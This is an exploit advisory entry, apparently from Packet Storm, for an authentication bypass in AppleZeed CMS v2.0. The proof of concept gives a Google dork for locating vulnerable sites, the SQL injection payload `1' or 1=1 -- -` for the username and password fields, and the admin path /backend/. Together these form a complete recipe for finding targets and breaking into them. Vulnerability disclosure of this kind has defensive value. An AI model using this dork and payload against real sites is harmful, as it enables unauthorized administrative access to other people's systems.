AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
b10dc7fe6d4f1a88b74eac3ee061dec5b828171e6513804abc4b45080828e37b====================================================================================================================================
| # Title : AppleZeed CMS v2.0 Auth by pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 71.0(32-bit) |
| # Vendor : https://applezeed.com |
| # Dork : intext:"Power BY applezeed.com "php?id=" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : user & pass = 1' or 1=1 -- -
[+] admin path = /backend/
[+] http://TARGET/backend/
Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed